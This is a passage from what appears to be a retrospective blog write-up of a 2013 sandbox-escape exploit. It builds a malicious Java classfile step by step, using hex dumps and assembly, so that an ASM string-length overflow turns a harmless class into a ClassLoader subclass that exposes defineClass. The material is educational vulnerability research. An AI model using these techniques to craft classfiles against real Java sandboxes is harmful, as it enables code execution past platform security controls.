The next thing after the constant pool is access_flags, a bitmask that gives the flags for the class (public, private, etc.). In this case, the bytes 65 76 decode to the flags private protected final super volatile native abstract annotation enum, which is not a valid combination of flags, so the classfile is rejected.

Now let’s try adding the bytes 10 01 to the beginning of “evilstring”. That corresponds to the access flags synthetic and public. The synthetic flag is a meaningless flag set by the Java compiler to indicate code that was generated implicitly by the compiler rather than part of the Java source, but we can put it on anything we want ourselves - it doesn’t affect execution. I included it here in order to avoid the high byte of our injected access_flags being null.

.class [0]
.super [0]
.const [1] = Utf8 "\x10\x01evilstring"

00000000: cafe babe 0000 0031 0002 0100 0010 0165  .......1.......e
00000010: 7669 6c73 7472 696e 6700 0000 0000 0000  vilstring.......
00000020: 0000 0000 0000 00                        .......

Now parsing of access_flags succeeds and the parser moves on to this_class, a two byte index into the constant pool, pointing to the Class constant representing the class contained in this classfile. The parser again sees the 65 76 (the “ev” in “\x10\x01evilstring”), and fails, since 65 76 (25974 in decimal) is higher than the maximum constant pool index (1, since we only defined one constant).

Now, let’s create an actual Class constant (named “Foo”) for this_class to refer to, and then try to add its index (00 02) to the beginning of evilstring so the parser can parse this_class. Evilstring is now “\x10\x01\x00\x02evilstring”

.class [2]
.super [0]

.const [1] = Utf8 "Foo"
.const [2] = Class [1]
.const [3] = Utf8 "\x10\x01\x00\x02evilstring"

00000000: cafe babe 0000 0031 0004 0100 0346 6f6f  .......1.....Foo
00000010: 0700 0101 0000 1001 c080 0265 7669 6c73  ...........evils
00000020: 7472 696e 6700 0000 0200 0000 0000 0000  tring...........
00000030: 0000 00                                  ...

The parser successfully parses 1001 as access_flags, then moves on to parse c080 as this_class… wait, what? We added “\x00\x02” to our string, but recall that the string data is MUTF-8 encoded. This means that the null byte is encoded as the two byte sequence c080, so the 0002 we tried to inject turned into c080 02. Obviously, c080 (decimal 49280) is higher than the max constant index (3 now), so parsing fails again.

One solution is to add enough constant pool entries so that the constants reach index 257 (0101 in hex), so we can refer to them from inside the injected string data without using null bytes. We’ll actually use this technique in the exploit later, but for now, let’s look at a different technique that we’ll also use later in the exploit, specifically Int and Long constants.

.class [2]
.super [0]

.const [1] = Utf8 "Foo"
.const [2] = Class [1]
.const [3] = Utf8 "\x03evilstring"
.const [4] = Utf8 "whatever"

Here we have two changes - evilstring is now just “\x03evilstring”, and we added an extra constant after evilstring.

00000000: cafe babe 0000 0031 0005 0100 0346 6f6f  .......1.....Foo
00000010: 0700 0101 0000 0365 7669 6c73 7472 696e  .......evilstrin
00000020: 6701 0008 7768 6174 6576 6572 0000 0002  g...whatever....
00000030: 0000 0000 0000 0000 0000                 ..........

Now, the constant pool count field is 0005 rather than 0004. This means that when the parser gets to the 0365 (the beginning of our new evilstring), instead of trying to parse it as access_flags, it instead tries to parse it as the fourth constant pool entry. 03 is the tag byte of an Int constant, which is followed by an arbitrary four bytes giving the integer value. Therefore, the parser takes the following four bytes, 65 7669 6c (the “evil” in “\x03evilstring”), and sets index 4 of the constant pool to the integer 0x6576696c.

Then it tries to parse access_flags starting at the bytes 73 74 (the “st” in evilstring), which is of course once again a bunch of invalid gibberish. However, we can continue this process by adding another fake tag.

.class [2]
.super [4]

.const [1] = Utf8 "Foo"
.const [2] = Class [1]
.const [3] = Utf8 "java/lang/Object"
.const [4] = Class [3]
.const [5] = Utf8 "java/lang/ClassLoader"
.const [6] = Class [5]
.const [7] = Utf8 "\x03evil\x05string"
.const [8] = Long 0x7700010002000600L
.const [10] = Utf8 "whatever"

00000000: cafe babe 0000 0031 000b 0100 0346 6f6f  .......1.....Foo
00000010: 0700 0101 0010 6a61 7661 2f6c 616e 672f  ......java/lang/
00000020: 4f62 6a65 6374 0700 0301 0015 6a61 7661  Object......java
00000030: 2f6c 616e 672f 436c 6173 734c 6f61 6465  /lang/ClassLoade
00000040: 7207 0005 0100 0003 6576 696c 0573 7472  r.......evil.str
00000050: 696e 6705 7700 0100 0200 0600 0100 0877  ing.w..........w
00000060: 6861 7465 7665 7200 0000 0200 0400 0000  hatever.........
00000070: 0000 0000 00                             .....

I added a 05 byte between the “evil” and “string” in evilstring, and also added some more Class constants we can use for the superclass. In this case, we’ll magically change the superclass from the harmless java/lang/Object to the evil java/lang/ClassLoader.

This time, with more constants added after the evilstring, the parser won’t stop parsing constants after parsing the 0365 7669 6c in evilstring as the Int constant 0x6576696c. Instead, it moves on to the next byte, which is 05, the tag byte for a Long constant. Long constants contain eight bytes of arbitrary data for the long value (rather than the four for integers), so this skips over the next eight bytes.

In this case, the next eight bytes are 73 7472 696e 6705 77, consisting of the “string” in evilstring, followed by the tag byte (05) and first content byte (77) of the constant Long 0x7700010002000600L which comes after evilstring.

At that point, we’ve reached the constant pool count (10) number of constants, so the parser continues by parsing the next two bytes of Long 0x7700010002000600L (0001) as access_flags, which results in just the flag public (no need to add synthetic here since integer constants can contain null bytes no problem.)

After that, it parses this_class (0002) followed by super_class (0006). In this case, the parsed superclass (6) points to java/lang/ClassLoader, rather than java/lang/Object like the original classfile did. We now have a classfile that appears harmless (inheriting from Object), but which turns evil (inheriting from ClassLoader) after the string overflow.

After that of course, the parser moves on to parsing inferfaces_count and interfaces, which fails due to garbage data, but hopefully you get the idea. In the actual exploit, we will need to carefully feed ASM enough constants to produce an entire valid classfile when parsed with the string overflow.

Exploit writing time!

At long last, we’re ready to craft the exploit classfile. We want something equivalent to this Java code after being processed by ASM and then reparsed by the JVM with the string overflow:

public class Exploit extends ClassLoader {
    public Class sneakyLoad(String name, byte[] b, ProtectionDomain pd) {
        return this.defineClass(name, b, 0, b.length, pd);
    }
}

This corresponds to the following bytecode:

.class public Exploit
.super java/lang/ClassLoader

.method public sneakyLoad : (Ljava/lang/String;[BLjava/security/ProtectionDomain;)Ljava/lang/Class;
    .code stack 99 locals 99
        aload_0
        aload_1
        aload_2
        iconst_0
        aload_2
        arraylength
        aload_3
        invokevirtual Method Exploit defineClass (Ljava/lang/String;[BIILjava/security/ProtectionDomain;)Ljava/lang/Class;
        areturn
    .end code
.end method

.method public <init> : ()V
    .code stack 99 locals 99
        aload_0
        invokespecial Method java/lang/ClassLoader <init> ()V
        return
    .end code
.end method
.end class

You may be wondering why the bytecode has two methods when the Java code only had one. The answer is that we need a constructor in order to instantiate the class. In Java, if you don’t include a constructor, the compiler will automatically generate one for you, but in bytecode you have to be explicit. In bytecode, constructors are just methods with the special name <init>, so the second method here is equivalent to the following Java code (which is all implicit in Java):

    public Exploit() {
        super();
        return;
    }

In the previous section, we used Krakatau to manually create a classfile with a specific constant pool in order to demonstrate how the overflow bug affects parsing. However, in the actual App Engine, the JVM will never directly see anything we create. Instead, we create a class with a specific sequence of ldc (load constant) instructions, which will then cause ASM to output the desired constants into the constant pool (which then gets reparsed as malicious code following the string overflow).

As shown in the previous section, there are two main ways to inject data into the constant pool: Utf8 constants and Long constants. Utf8 has the advantage of allowing you to inject up to ~65k bytes at once, but the encoded string data can’t contain null bytes, which is a severe disadvantage, since many places in the classfile format effectively require null bytes. (Additionally, every byte above 127 has to be part of a valid unicode sequence, but that’s easier to work around.)

Long constants only allow us to inject eight bytes at a time, but those can include null bytes. The problem is that every 9th byte has to be the tag byte (05). For this exploit, we’ll just be using a single Utf8 constant to hide some strings and constants we don’t want ASM to see, and use Long constants to construct the rest of the classfile, thanks to their increased flexibility. However, this does mean we have to Tetris them in and carefully figure out which points in the classfile can afford to have a 05 byte stuffed in.

Recall that the overall format for a classfile is as follows:

ClassFile {
    u4             magic;
    u2             minor_version;
    u2             major_version;
    u2             constant_pool_count;
    cp_info        constant_pool[constant_pool_count-1];
    u2             access_flags;
    u2             this_class;
    u2             super_class;
    u2             interfaces_count;
    u2             interfaces[interfaces_count];
    u2             fields_count;
    field_info     fields[fields_count];
    u2             methods_count;
    method_info    methods[methods_count];
    u2             attributes_count;
    attribute_info attributes[attributes_count];
}

We only have to worry about the part after the constant pool. We’ll set access_flags to 0001 (public), and we don’t have any interfaces, fields, or attributes (at the class level anyway, more on attributes later) so we can set those counts to 0. We’ll have two methods (sneakyLoad and <init>) so methods_count is 2.

Therefore, the classfile so far looks like this, where [foo] are placeholders to be filled in with the relevant constant pool index later, and $foo are other placeholders.

access_flags 0001
this_class [this_cls]
super_class [super_cls]
interfaces_count 0000
fields_count 0000
methods_count 0002
methods $method1 $method2
attributes_count 0000

Putting that together, we get 0001 [this_cls] [super_cls] 0000 0000 0002 $method1 $method2 0000 so far.

The format for a method is as follows:

method_info {
    u2             access_flags;
    u2             name_index;
    u2             descriptor_index;
    u2             attributes_count;
    attribute_info attributes[attributes_count];
}

We’ll handle the first method (sneakyLoad) first, since it is more complicated, and <init> will be very similar.

A method without any bytecode is not very interesting. Interestingly, the code is not stored directly as part of the method_info structure. Instead, it is stored in an attribute of the method, named Code.

There are several places in the classfile format where attributes can be added (specifically, at class level, on methods and fields, and on Code attributes). At their most basic, an attribute is just a name, length field, and then a bunch of data that depends on the type of attribute.

Attributes can have any name. The classfile format defines several dozen standard attributes with specific names and formats that affect the class. Any attributes with names that aren’t on the list of standard attributes will be treated as opaque binary blobs and skipped over by the parser.

For our purposes, the only standard attribute that matters is the Code attribute, which can appear only on a method and contains the bytecode for that method. The format of a Code attribute is as follows:

Code_attribute {
    u2 attribute_name_index;
    u4 attribute_length;
    u2 max_stack;
    u2 max_locals;
    u4 code_length;
    u1 code[code_length];
    u2 exception_table_length;
    {   u2 start_pc;
        u2 end_pc;
        u2 handler_pc;
        u2 catch_type;
    } exception_table[exception_table_length];
    u2 attributes_count;
    attribute_info attributes[attributes_count];
}

Every attribute begins with attribute_name_index and attribute_length. The latter tells the parser how many bytes to skip over if the attribute is not recognized as a standard attribute and thus has an unknown format.

max_stack and max_locals tell the JVM how much space to allow for the operand stack and local variable table respectively of this method. A tool like ASM or the Java compiler will calculate the maximum stack and locals actually used by the method’s bytecode to fill in these fields, but this is sometimes a pain to do when writing bytecode by hand.

Luckily, there’s no penalty for providing limits that are higher than necessary here, so I usually just fill them in with arbitrary values that are higher than necessary, like 99 in all the above examples.

Note: Theoretically, the most flexible option when writing bytecode by hand is to just set them both to 65535, the maximum possible. However, in my experience, this usually causes the JVM to crash when actually running your code, due to allocating excessively large stack frames in interpreted mode and running out of stack space. Therefore, it’s best to set them to a small, but still excessive value like 99.

Next up, we have code_length and code, which is just the actual bytecode for the method. Recall that the code for sneakyLoad in Krakatau assembly syntax looks like this:

.method public sneakyLoad : (Ljava/lang/String;[BLjava/security/ProtectionDomain;)Ljava/lang/Class;
    .code stack 99 locals 99
        aload_0
        aload_1
        aload_2
        iconst_0
        aload_2
        arraylength
        aload_3
        invokevirtual Method Exploit defineClass (Ljava/lang/String;[BIILjava/security/ProtectionDomain;)Ljava/lang/Class;
        areturn
    .end code
.end method

Each line between .code and .end code represents one instruction in the bytecode. Most bytecode instructions are one byte, but the invokevirtual instruction is three bytes - one byte for the opcode followed by two for the constant pool index pointing to the corresponding Method constant.

Luckily, we don’t have to bother looking up the opcodes for these instructions ourselves, we can just use Krakatau to generate the bytecode by running it on the above code. The result is 2A 2B 2C 03 2C BE 2D B6[defineClass_method] B0, where [defineClass_method] is a placeholder to be filled in later with the appropriate constant pool index.

Lastly, the Code attribute contains the exception table and subattributes. We’re not using those, so we’ll just set both counts to 0. Putting this together yields the following bytes for the Code attribute:

[Code_utf] 00000015 $stack $locals 0000000B 2A 2B 2C 03 2C BE 2D B6[defineClass_method] B0 0000 0000

Then we can insert this back into the method structure above. Assuming we choose access_flags = 0001 (just public) and no attributes for the method other than the code attribute, we have

$method1 = 0001 [sneakyLoad_utf] [sneakyLoad_desc_utf] 0001 [Code_utf] 00000015 $stack $locals 0000000B 2A 2B 2C 03 2C BE 2D B6[defineClass_method] B0 0000 0000

Inserting this back into the classfile gives

0001 [this_cls] [super_cls] 0000 0000 0002 0001 [sneakyLoad_utf] [sneakyLoad_desc_utf] 0001 [Code_utf] 00000015 $stack $locals 0000000B 2A 2B 2C 03 2C BE 2D B6[defineClass_method] B0 0000 0000 $method2 0000

Tiling sneakyLoad, part 1

However, we now have a problem. We have to somehow Tetris-in the Long constant tag bytes, and find a way to fit a 05 byte in every 9th byte here. Unfortunately, there are long stretches of data here where that is awkward or impossible.

There are multiple ways to break things up, but here’s the solution I came up with while recreating the exploit in the process of writing this blog post. (I don’t remember exactly how I did it back in 2013, but I do remember that I made some decisions differently, resulting in minor differences in the locations and type of tag bytes used.)

In order to make this work, we’ll have to place some constraints on the positioning of the relevant constant pool entries. To start with, we’ll constrain the lower byte of [super_cls] to be 05. This leaves the following eight bytes (0000 0000 0002 0001) free. Next, we’re at the high byte of [sneakyLoad_utf]. We could make it 05 again, but that would mean having at least 5*256 constant pool entries, which is a lot, and I wanted to keep the exploit class as small and simple as I can. Plus the positioning of the tag bytes works out better with an Int here anyway. Therefore, we’ll set the high byte of [sneakyLoad_utf] to 03, the tag byte of an Int.

This covers the next four bytes (the low byte of [sneakyLoad_utf], [sneakyLoad_desc_utf], and the high byte of the attribute count, 0001). This leaves us at the low byte of the attribute count, which we currently have as 01.

Our method only needs one attribute (the Code attribute), but 01 is not a useful tag byte. Luckily, we can add as many non-standard attributes to anything as we want, and the JVM will just ignore them, so we’ll set the attribute count to 0005 here and add four useless custom attributes in after the Code attribute to let the tiling process continue.

Now we get into the bytes for the Code attribute, where things are easier. After skipping the first eight bytes (the name index, attribute length, and max_stack value), we’re left at the high byte of the max_locals value. Luckily, max_locals is completely arbitrary, so we’ll just set it to 0500. (In this exploit, I set its partner, max_stack to 0042 since it’s also an arbitrary value.)

Next, we skip eight bytes (the low byte of max_locals, the four bytes of code_length, and the first three bytes of the bytecode, 2A 2B 2C), landing us in the middle of the bytecode. Luckily, bytecode is highly flexible in this respect. The tag byte 05 corresponds to the iconst_2 instruction in bytecode, which just pushes the integer 2 onto the operand stack. We can then follow it with a pop instruction (57), to undo it. This means that we can insert 05 57 anywhere in the middle of bytecode (as long as it isn’t the middle of a multibyte instruction). Furthermore, we can also insert nop instructions (00) anywhere to line things up better if necessary. In this case, we’ll insert one nop at the end.

Recap

We now have 0001 [this_cls] [super_cls] 0000 0000 0002 0001 [sneakyLoad_utf] [sneakyLoad_desc_utf] 0005 [Code_utf] 0000001C 0042 0500 00000010 2A 2B 2C 0557 03 2C BE 2D B6[defineClass_method] 0557 B0 00 0000 0000 $other_attrs $method2 0000

Note that code_length changed from 0000000B to 00000010 because we added five instructions (two iconst_2 pop pairs and one nop). Likewise, attribute_length changed from 00000015 to 0000001C.

We also have the following constraints on the constant pool that we’ll have to satisfy later (where ** can be anything):

[super_cls] = **05
[sneakyLoad_utf] = 03**

Our exploit class is starting to take shape. So far, we have something like this, where “evilstring” is the giant null byte laden string with exact contents to be determined later, and the -s in the integer constants are placeholders to be filled in later. Note here that the integer constants contain all the bytes we just worked out except for the tag bytes themselves.

.class public Exploit
.super java/lang/Object

.method public woodlelyDoodlely : ()I
    .code stack 2000 locals 10
        ldc_w "evilstring"

        ldc2_w 0x------0001------L
        ldc2_w 0x0000000000020001L
        ldc_w  0x------00
        ldc2_w 0x----0000001C0042L
        ldc2_w 0x00000000102A2B2CL
        ldc2_w 0x57032CBE2DB6----L
        ldc2_w 0x57B0000000000000L

        iconst_0
        ireturn
    .end code
.end method
.end class

Now we can add some constants we need at the beginning that we don’t care about hiding from ASM and don’t need to be in a specific position in the constant pool:

.method public woodlelyDoodlely : ()I
    .code stack 2000 locals 10
        ldc_w "(Ljava/lang/String;[BLjava/security/ProtectionDomain;)Ljava/lang/Class;"
        ldc_w "Code"

        ldc_w "evilstring"

        ; Longs here

        iconst_0
        ireturn
    .end code
.end method

We can assemble this class and then run it through ASM (with no bytecode transformations added) in order to see what the constant pool ordering will look like after going through ASM.

.const [1] = Utf8 Exploit 
.const [2] = Class [1] 
.const [3] = Utf8 java/lang/Object 
.const [4] = Class [3] 
.const [5] = Utf8 woodlelyDoodlely 
.const [6] = Utf8 ()I 
.const [7] = Utf8 (Ljava/lang/String;[BLjava/security/ProtectionDomain;)Ljava/lang/Class; 
.const [8] = String [7] 
.const [9] = Utf8 Code 
.const [10] = String [9] 
.const [11] = Utf8 evilstring 
.const [12] = String [11] 

As we can see here, the two strings we just added show up at indices 7 and 9 respectively, so we can now fill in the placeholders in the previous data with [sneakyLoad_desc_utf] = 0007 and [Code_utf] = 0009.

This results in 0001 [this_cls] [super_cls] 0000 0000 0002 0001 [sneakyLoad_utf] 0007 0005 0009 0000001C 0042 0500 00000010 2A 2B 2C 0557 03 2C BE 2D B6[defineClass_method] 0557 B0 00 0000 0000 $other_attrs $method2 0000.

Tiling part 2

When we left off before, we had just tiled the code for the sneakyLoad method with Long constants, carefully finding places to put the tag bytes. However, we had to set the method attribute count to 5, meaning that we need to add four extra dummy attributes. Now, we’ll cover that, as well as tiling the second method (<init>) and everything else.

Recall that an attribute can have any name, and attributes with names that aren’t on the list of standard attributes defined in the classfile format are just ignored by the JVM. Therefore, we can use any name except Code for our extra attributes, and put whatever data we want into them. Since woodlelyDoodlely is conveniently at constant pool index 0005, we’ll use that for all our attribute names.

The last constant we added previously was ldc2_w 0x57B0000000000000L. This covers the pop, the return instruction (B0), an extra nop (00), then the four bytes for the exception table count and attribute count of the Code attribute. Finally, there’s one byte left over, the high byte of the name index for the following attribute.

This means that after that comes a tag byte, meaning the name index of the second attribute is 0005, which is convenient, since we decided to name all our attributes woodlelyDoodlely.

This means that next up, we have the attribute length field, where we can put whatever we want. We’ll make the custom attributes three bytes long each, so we can line it up with the 05 in the name index for each attribute. The attribute data is arbitrary, so I just chose AAAAAA, BBBBBB, CCCCCC, etc. so they’re easy to tell apart. For the final custom attribute however, we’ll make it six bytes instead of three in order to line up the tag bytes for when we tackle the second method, which comes right afterwards.

Therefore, the five attributes of the sneakyLoad method have the following contents:

attr1 (Code) = 0042 0500 00000010 2A 2B 2C 0557 03 2C BE 2D B6[defineClass_method] 0557 B0 00 0000 0000
attr2 (wD) = AAAAAA
attr3 (wD) = BBBBBB
attr4 (wD) = CCCCCC
attr5 (wD) = DDDDDD DD 05 00

and the bytes for the sneakyLoad method as a whole are now

[sneakyLoad_utf] 0007 0005 
0000001C 0042 0500 00000010 2A 2B 2C 0557 03 2C BE 2D B6[defineClass_method] 0557 B0 00 0000 0000 
00000003 AAAAAA
00000003 BBBBBB
00000003 CCCCCC
00000006 DDDDDD DD 05 00

Now, we can use a similar process for the second method, although things are easier this time around, because we have more flexibility over the start due to being preceded by the custom attribute at the end of the first method. In fact, we put a tag byte second to last inside that custom attribute, meaning we can skip right over the first seven bytes of the second method (covering access_flags, name_index, descriptor_index, and the high byte of attributes_count.)

We’re now at the low byte of the attribute count for <init>, which needs to be a tag byte, so we’ll once again give it an attribute count of 5, just like the first method. In fact, we’re now in the exact same position as we were in the first method, so the tag bytes after this will end up in the same position as well.

Next comes the name and attribute length for the Code attribute. Recall that our goal for the injected bytecode looks like this:

.method public sneakyLoad : (Ljava/lang/String;[BLjava/security/ProtectionDomain;)Ljava/lang/Class;
    .code stack 99 locals 99
        aload_0
        aload_1
        aload_2
        iconst_0
        aload_2
        arraylength
        aload_3
        invokevirtual Method Exploit defineClass (Ljava/lang/String;[BIILjava/security/ProtectionDomain;)Ljava/lang/Class;
        areturn
    .end code
.end method

.method public <init> : ()V
    .code stack 99 locals 99
        aload_0
        invokespecial Method java/lang/ClassLoader <init> ()V
        return
    .end code
.end method

For sneakyLoad, we had 9 instructions and 11 bytes of bytecode, (prior to adding the iconst_2 pops and nop, which bumped it up to 16 bytes of bytecode.) For <init>, we only have 3 instructions and 5 bytes of bytecode (aload_0 invokespecial return), since the constructor is much simpler.

However, as it turns out, we’ll end up adding so many nops to this method’s bytecode in order to line up the tag bytes conveniently, that we’ll end up with 16 bytes of bytecode again anyway, which means that the final code length and attribute length will be the same as the previous method (00000010 and 0000001C respectively).

In fact, there’s a minor gotcha here: recall that ASM deduplicates identical constants. If it sees an ldc instruction pointing to a constant that is the same as one it has already allocated in the constant pool, it will just reuse the old one instead of allocating a new constant. This means that every constant we inject has to be distinct. If we just did things the same way as before, we’d end up with an identical constant covering the beginning of the Code attribute for the two methods, so we’ll set max_stack to 0043 here instead of 0042 to keep them distinct.

Now comes the bytecode for the <init> method. Before we add anything, we just have five bytes: 2A B7[CL_init_method] B1. However, we’ll add a bunch of nop instructions (00 bytes) to line things up the same way as before, along with the two iconst_2 pop pairs (05 57) to cover the two tag bytes like before. This gives us a final bytecode of 2A 00 00 0557 B7[CL_init_method] B1 00 00 00 0557 00 00.

Then we once again set the exception table length and subattribute count to 0, and add custom attributes to the method like before, giving us the following:

attr1 (Code) = 0043 0500 00000010 2A 00 00 0557 B7[CL_init_method] B1 00 00 00 0557 00 00 0000 0000
attr2 (wD) = AAAAAA
attr3 (wD) = BBBBBB
attr4 (wD) = CCCCCC
attr5 (wD) = DDDDDD DD 05 00

However, this won’t actually work. First off, since ASM merges identical constants, we can’t reuse the attribute values, so we’ll use 666666, 777777, etc. instead of AAAAAA, BBBBBB, etc. this time.

Second, we need to do something tricky with the final custom attribute. So far, we’ve used a bunch of Long constants to inject all the bytes that will become our malicious classfile when parsed by the JVM following the string overflow. However, this is all just part of the constant pool from ASM’s perspective. ASM will continue writing out the rest of the classfile, such as the woodlelyDoodlely method and all the bytecode for all those ldc instructions that we used to cause ASM to write out the constants.

Since a classfile isn’t allowed to contain extra data at the end, we need some way to “comment out” all of this extra junk at the end to prevent the JVM from rejecting the overflown classfile. Luckily, since custom attributes can contain arbitrarily long amounts of arbitrary binary data, we can just comment it all out by making it part of the custom attribute content from the JVM’s perspective.

For example, if we set the attribute length to 100, but only provided 5 bytes of actual data, the JVM parser would include the following 95 bytes as part of that attribute’s data and thus ignore it. Therefore, instead of setting the length of the final woodlelyDoodlely attribute to 6 bytes here like we did for the first method, we instead need to wait until we’ve finished crafting the entire classfile, then run it through ASM and see how many extra bytes of stuff got added afterwards, and then adjust the attribute length here appropriately. (Spoiler alert: The answer is 00000E25.)

Therefore, the final contents of our attributes for the second method are as follows:

attr1 (Code) = 0043 0500 00000010 2A 00 00 0557 B7[CL_init_method] B1 00 00 00 0557 00 00 0000 0000
attr2 (wD) = 666666
attr3 (wD) = 777777
attr4 (wD) = 888888
attr5 (wD) = 999999 99   (bunch of ASM junk is included from the JVM's perspective here)

And the final bytes for the <init> method as a whole are

[init_utf] [init_desc_utf] 0005 
0000001C 0043 0500 00000010 2A 00 00 0557 B7[CL_init_method] B1 00 00 00 0557 00 00 0000 0000
00000003 666666
00000003 777777
00000003 888888
00000E25 999999 99

This leads to the following bytes we need to inject for the post-constant pool parts of the classfile as a whole:


[this_cls] 
[super_cls] 


0002

[sneakyLoad_utf] 0007 0005 
0000001C 0042 0500 00000010 2A 2B 2C 0557 03 2C BE 2D B6[defineClass_method] 0557 B0 00 0000 0000 
00000003 AAAAAA
00000003 BBBBBB
00000003 CCCCCC
00000006 DDDDDD DD 05 00

[init_utf] [init_desc_utf] 0005 
0000001C 0043 0500 00000010 2A 00 00 0557 B7[CL_init_method] B1 00 00 00 0557 00 00 0000 0000
00000003 666666
00000003 777777
00000003 888888
00000E25 999999 99

Note that we no longer include the attributes_count of 0000 at the end of the classfile since our input classfile also contains no class attributes, so ASM will write that out at the end as well. Instead of trying to inject it ourselves (which wouldn’t work anyway), we merely have to not comment out the final two bytes of ASM’s output.

This brings us to the following code, where - are placeholders for values to be filled in later:

.method public woodlelyDoodlely : ()I
    .code stack 2000 locals 10
        ldc_w "(Ljava/lang/String;[BLjava/security/ProtectionDomain;)Ljava/lang/Class;"
        ldc_w "Code"

        ldc_w "evilstring"

        ldc2_w 0x------0001------L
        ldc2_w 0x0000000000020001L
        ldc_w  0x--000700
        ldc2_w 0x00090000001C0042L
        ldc2_w 0x00000000102A2B2CL
        ldc2_w 0x57032CBE2DB6----L
        ldc2_w 0x57B0000000000000L
        ldc2_w 0x00000003AAAAAA00L
        ldc2_w 0x00000003BBBBBB00L
        ldc2_w 0x00000003CCCCCC00L
        ldc2_w 0x00000006DDDDDDDDL
        ldc2_w 0x000001--------00L
        ldc2_w 0x00090000001C0043L
        ldc2_w 0x00000000102A0000L
        ldc2_w 0x57B7----B1000000L
        ldc2_w 0x5700000000000000L
        ldc2_w 0x0000000366666600L
        ldc2_w 0x0000000377777700L
        ldc2_w 0x0000000388888800L
        ldc2_w 0x00000E2599999999L

        iconst_0
        ireturn
    .end code
.end method

Next up, we have to fill in those placeholders and construct the real value for evilstring. Additionally, we have to satisfy the following constraints while doing so:

[super_cls] = **05
[sneakyLoad_utf] = 03**

More constants

Now we can add in some more strings that we need, to help fill the placeholders:

        ldc_w "(Ljava/lang/String;[BLjava/security/ProtectionDomain;)Ljava/lang/Class;"
        ldc_w "Code"
        
        ldc_w "defineClass"
        ldc_w "(Ljava/lang/String;[BIILjava/security/ProtectionDomain;)Ljava/lang/Class;"
        ldc_w "<init>"
        ldc_w "()V"
        ldc_w "java/lang/ClassLoader"

        ldc_w "evilstring"

However, unlike the first two strings we added ("Code" and "(Ljava/lang/String;[BLjava/security/ProtectionDomain;)Ljava/lang/Class;"), we need the new constants to appear at index 257 or higher for reasons that will become clear later. Therefore, we need to first insert a bunch of dummy constants we aren’t using in order to push "defineClass", etc. up to index 257.

        ldc_w "(Ljava/lang/String;[BLjava/security/ProtectionDomain;)Ljava/lang/Class;"
        ldc_w "Code"
        
        ldc_w "s_b"
        ldc_w "s_d"
        ldc_w "s_f"
        ldc_w "s_11"
        ldc_w "s_13"
        ...
        ldc_w "s_fb"
        ldc_w "s_fd"
        ldc_w "s_ff"

        ldc_w "defineClass"
        ldc_w "(Ljava/lang/String;[BIILjava/security/ProtectionDomain;)Ljava/lang/Class;"
        ldc_w "<init>"
        ldc_w "()V"
        ldc_w "java/lang/ClassLoader"

        ldc_w "evilstring"

In order to make things easier to understand, we’ll name the dummy strings s_addr where addr is the index where the corresponding Utf8 constant will appear in hexadecimal. Therefore s_b appears at index 11 (b in hex), s_ff appears at index 255 (ff in hex), etc.

We need to add a total of 123 strings here in order to push "defineClass" up to index 257. Recall that each string literal results in two constant pool entries, one Utf8 constant and one String constant that points to it. Therefore the ldc_w "s_ff" line will cause ASM to output a Utf8 constant at index 255 and a String constant at index 256 pointing to it. Therefore, the next line ldc_w "defineClass" results in a Utf8 constant for "defineClass" at index 257, just like we wanted. (It also results in a String constant at index 258, but we don’t care about the Strings, just the Utf8 constants.)

With these placeholders added, we can fill in two additional placeholders: [init_utf] = 0105 and [init_desc_utf] = 0107. The other three are constants we’ll need later when we work on evilstring itself.

        ldc2_w 0x------0001------L
        ldc2_w 0x0000000000020001L
        ldc_w  0x--000700
        ldc2_w 0x00090000001C0042L
        ldc2_w 0x00000000102A2B2CL
        ldc2_w 0x57032CBE2DB6----L
        ldc2_w 0x57B0000000000000L
        ldc2_w 0x00000003AAAAAA00L
        ldc2_w 0x00000003BBBBBB00L
        ldc2_w 0x00000003CCCCCC00L
        ldc2_w 0x00000006DDDDDDDDL
        ldc2_w 0x0000010105010700L
        ldc2_w 0x00090000001C0043L
        ldc2_w 0x00000000102A0000L
        ldc2_w 0x57B7----B1000000L
        ldc2_w 0x5700000000000000L
        ldc2_w 0x0000000366666600L
        ldc2_w 0x0000000377777700L
        ldc2_w 0x0000000388888800L
        ldc2_w 0x00000E2599999999L

The hidden constant pool

The main purpose of evilstring is to contain enough null bytes to overflow the length calculation, thus triggering the whole vulnerability in the first place. However, we’ll also take the opportunity to inject some constant pool entries that we don’t want ASM to see.

Recall that when using constant pool entries to set up the bytes that will be re-interpreted as our exploit code post-overflow, the two useful types of constants are Long, which holds arbitrary data but requires a tag byte every 9th byte, and Utf8, which can hold arbitrarily long amounts of data with no tag bytes, but which can’t contain any null bytes. We decided to use Long constants (plus one Int constant) to inject the method definitions, bytecode, etc. However, we’ll use a Utf8 constant (evilstring itself) to inject the constant pool, or rather the parts of the constant pool that we can’t let ASM see (the other parts we can just add as normal constants, as was done above).

There are three constants referenced from elsewhere in the bytecode that we have to hide from ASM in order to avoid potential meddling:

Class java/lang/ClassLoader, which will be our new superclass
Method Exploit defineClass (Ljava/lang/String;[BIILjava/security/ProtectionDomain;)Ljava/lang/Class;, the actual method to load classes
Method java/lang/ClassLoader <init> ()V, the superclass constructor we call in our own constructor

As mentioned previously, Class constants do not store the name of the class directly. Instead, they point to a Utf8 constant which stores this. The same is true for Method constants. Method constants actually point to a whole tree of other constants.

A Method constant points to a Class constant representing the class containing the method and a NameAndType constant representing the name and descriptor of the method. The NameAndType constant in turn points to two Utf8 constants storing the name and descriptor of the method respectively. This means that we need a bunch of hidden constant pool entries like the following:

.const [defineClass_method] = Method [this_cls] [defineClass_nat]
.const [this_cls] = Class [this_utf]
.const [this_utf] = Utf8 "Exploit"
.const [defineClass_nat] = NameAndType [defineClass_utf] [defineClass_desc_utf]

.const [CL_init_method] = Method [super_cls] [CL_init_nat]
.const [CL_init_nat] = NameAndType [init_utf] [init_desc_utf]
.const [super_cls] = Class [super_utf]

We’ll start from the bottom up with [this_cls] and [this_utf]. [this_cls] is a Class constant for the very class we’re defining, i.e. Exploit. At first glance, this might seem unnecessary. In fact, there already is such a constant in the constant pool - it’s the very first constant ASM adds to any class!

However, there’s an issue here. All the hidden constants we’re creating here are injected as part of the content of a giant Utf8 constant in ASM’s view (the one we call evilstring). However, the content of a Utf8 constant is MUTF-8 encoded string data, which means it can’t contain null bytes. The existing copy of [this_cls] is at index 0002, since it’s the very first thing ASM adds to the constant pool (index 0001 is the Utf8 name of the class which the Class at index 0002 points to).

This means that in order to reference [this_cls] from hidden constants, we have to put it at index 0101 (257 in decimal) or higher. Since it already exists at index 2 and ASM merges duplicate constants, it’s impossible to get ASM to ever do this. Therefore, we have to create our own, hidden, version of [this_cls], even though one already exists.

